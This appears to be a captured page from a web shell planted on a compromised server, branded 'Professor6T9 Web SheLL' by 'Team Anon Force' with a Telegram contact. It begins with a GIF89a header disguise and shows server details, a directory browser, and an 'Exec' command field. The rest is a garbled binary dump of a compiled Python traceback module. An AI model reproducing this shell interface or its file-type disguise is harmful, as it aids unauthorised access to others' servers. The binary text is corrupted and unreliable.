GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
opt
/
ispmanager
/
python3.9
/
lib
/
python3.9
/
__pycache__
[ HOME ]
Exec
Submit
traceback.cpython-39.pyc
a 5��U�D� @ s d Z ddlZddlZddlZddlZg d�Zd4dd�Zdd� Zd5dd �Zd6d d�Z d7dd �Z dZdZd8dd�Z d9dd�Zdd� Zdd� Zdd� Zd:dd�Zd;dd�Zd<dd �Zd=d!d"�Zd>d#d$�Zd?d%d&�Zd'd(� ZG d)d*� d*�Zd+d,� Zd-d.� Zd/ZG d0d1� d1e�ZG d2d3� d3�ZdS )@z@Extract, format and print information about Python stack traces.� N)� extract_stack� extract_tb�format_exception�format_exception_only�format_list�format_stack� format_tb� print_exc� format_exc�print_exception� print_last�print_stack�print_tb�clear_frames�FrameSummary�StackSummary�TracebackException� walk_stack�walk_tbc C s4 |du rt j}t�| ��� D ]}t||dd� qdS )zyPrint the list of tuples as returned by extract_tb() or extract_stack() as a formatted stack trace to the given file.N� ��file�end)�sys�stderrr � from_list�format�print)�extracted_listr �item� r �4/opt/ispmanager/python3.9/lib/python3.9/traceback.py� print_list s r"